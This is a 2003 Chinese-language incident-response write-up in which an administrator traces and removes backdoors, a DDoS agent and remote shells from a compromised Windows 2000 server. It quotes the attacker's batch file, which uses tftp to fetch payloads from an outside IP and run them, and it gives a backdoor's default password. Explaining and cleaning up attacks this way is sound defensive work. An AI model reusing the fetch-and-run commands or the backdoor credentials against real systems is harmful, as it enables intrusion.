一次WIN2K下的常见入侵检测
/ns/hk/hacker/data/20030317231827.htm
2003年3月17日午时:
无意发现ADMIN密码被改,大惊,用fport看了下,发现hgzserver.exe,原来是个后门,杀了进程,删除后。
进到system32(因为某些小孩就喜欢往ADMIN$传东西)。发现如下文件
----------------------------------------------------------------------
C:\WINNT\system32>dir /od
....
2003-03-15 12:02 141 put.bat
2003-03-15 16:09 40,363 wins.dll
2003-03-15 16:09 33,305 winns.exe
2003-03-15 16:09 33,305 TInject.Dll
2003-03-15 16:09 100,864 wupdmgr32.exe
2003-03-15 16:09 5,936 srvsupp.exe
2003-03-15 16:09 102 autocrat_log.log
2003-03-17 14:13 19,968 wsock32s.dll
2003-03-17 14:13 27,648 wsock32l.dll
2003-03-17 14:13 18,432 wsock32p.dll
看下PUT.BAT:
----------------------------------------------------------
tftp -i 218.22.181.46 get wins.dll
tftp -i 218.22.181.46 get winns.exe
winns -run
tftp -i 218.22.181.46 get server.exe
server
-----------------------------------------------------------
通过以上,起码直接攻击源找到了,先不管他是不是肉鸡,总之可以证明对方是个新手,先传了WINNS想偷我的
密码,我按照winns -run 猜测了下:
----------------------------------
C:\WINNT\system32>winns -stop
Inject DLL Into Remote Process V1.3 By WinEggDrop
The Service Is Not Running Currently
C:\WINNT\system32> //瞧见了吧,这要怪我们的WinEggDrop (推卸责任)
至于这个SERVER.exe,我们来看看,autocrat_log.log:
------------------------------------------------------
2003-3-15 16:09:10 - Autocrat DDoS Server 成功启动.
2003-3-15 16:09:21 - Autocrat DDoS Server 关闭.
------------------------------------------------------
原来是个WIN下的DDos工具,入侵者还算仁慈。那个server.exe就是被控端。
好了,到此我们已经清楚了,接下来是善后工作:
先netstat -a看下目前端口:
TCP server:4899 server:0 LISTENING
TCP server:8535 server:0 LISTENING
TCP server:8536 server:0 LISTENING
TCP server:9966 server:0 LISTENING
TCP server:20540 server:0 LISTENING
天啊~`,这么多,我低估了那个家伙#¥%%・¥%,8535是独裁者(就是那个DDOS工具),8536是独裁者调用的
某某人现成的WINSHELL后门,
telnet 127.0.0.1 8536
WINSHELL 5.0
LOGIN:
晕还是5.0的,用独裁者默认的密码autocrat,进去了,打个?出来些帮助,看看,原来删除就是打个r。
WINSHELL删完了。
独裁者本身目前是删不掉了,按他的设计思路我只知道必须要重新启动别的系统来删除那几个文件。
接着看:
-----------------------------------
telnet 127.0.0.1 9966
WinEggDrop Shell V1.39 By WinEggDrop
Enter Password:
-------------------------------------
天啊,WinEggDrop,说老实话,我有点讨厌你了。
再看
-------------------------------------------------------
telnet 127.0.0.1 20540
---[ T-Cmd v1.0 beta, by TOo2y ]---
---[ E-mail: TOo2y@safechina.net ]---
---[ HomePage: www.safechina.net ]---
---[ Date: 02-05-2003 ]---
Escape Character is 'CTRL+]'
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
C:\WINNT\system32>
---------------------------------------------------------
晕~,还是用fport吧:
------------------------------------
D:\fport.exe
852 r_server -> 4899 TCP C:\WINNT\System32\r_server.exe
720 wupdmgr32 -> 8535 TCP C:\WINNT\System32\wupdmgr32.exe
364 svchost -> 9966 TCP C:\WINNT\system32\svchost.exe
104 ntkrnl -> 20540 TCP C:\WINNT\system32\ntkrnl.exe
---------------------------------------------------------------------
至此我已经没什么好说的了。・#¥・#¥
先是r_server,先在注册表里查找r_server,在
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\radmm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\radmm
先停掉系统服务里的radmm,删除他们,然后再删除r_server.exe
wupdmgr32我刚才说了,暂时我没办法,等进98下再删,
然后是WinEggDrop Shell V1.39,该兄利用了进程插入的方法,由于插入到了svchost.exe,暂时也没办法手工
弄,只有下载杀毒软件了。除非WinEggDrop本人能给个手工解决方案:(
下面到ntkrnl了,去系统服务里找到先停掉,然后删除ntkrnl.exe。
netstat结果目前就剩下
720 wupdmgr32 -> 8535 TCP C:\WINNT\System32\wupdmgr32.exe
364 svchost -> 9966 TCP C:\WINNT\system32\svchost.exe
这两个了,在系统暂时不能重起并让远程无法连接的情况下,只有在本地策略里禁掉这两个端口的所有连接了
,(具体方法就不再罗嗦了)。
目前整个系统是乱七八糟,也懒得改ADMIN密码了。通过以上,根本不敢乱说现在系统就是绝对干净的了,看来
只有重做了。
这次被入侵,我想说的是,某些非专业入侵者并不可怕,可怕的是一些提供给这些入侵者工具,初步估计我的
系统是因为被某些上网好动分子在不经意间被人恶意利用并一步一步渗透了。在这里用自己的教训给所有系统
管理员提个醒了。
SysHu0teR
2003.3.17.15:40
===============================================
本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处
文章类型:原创 提交:SysHu0teR 核查:NetDemon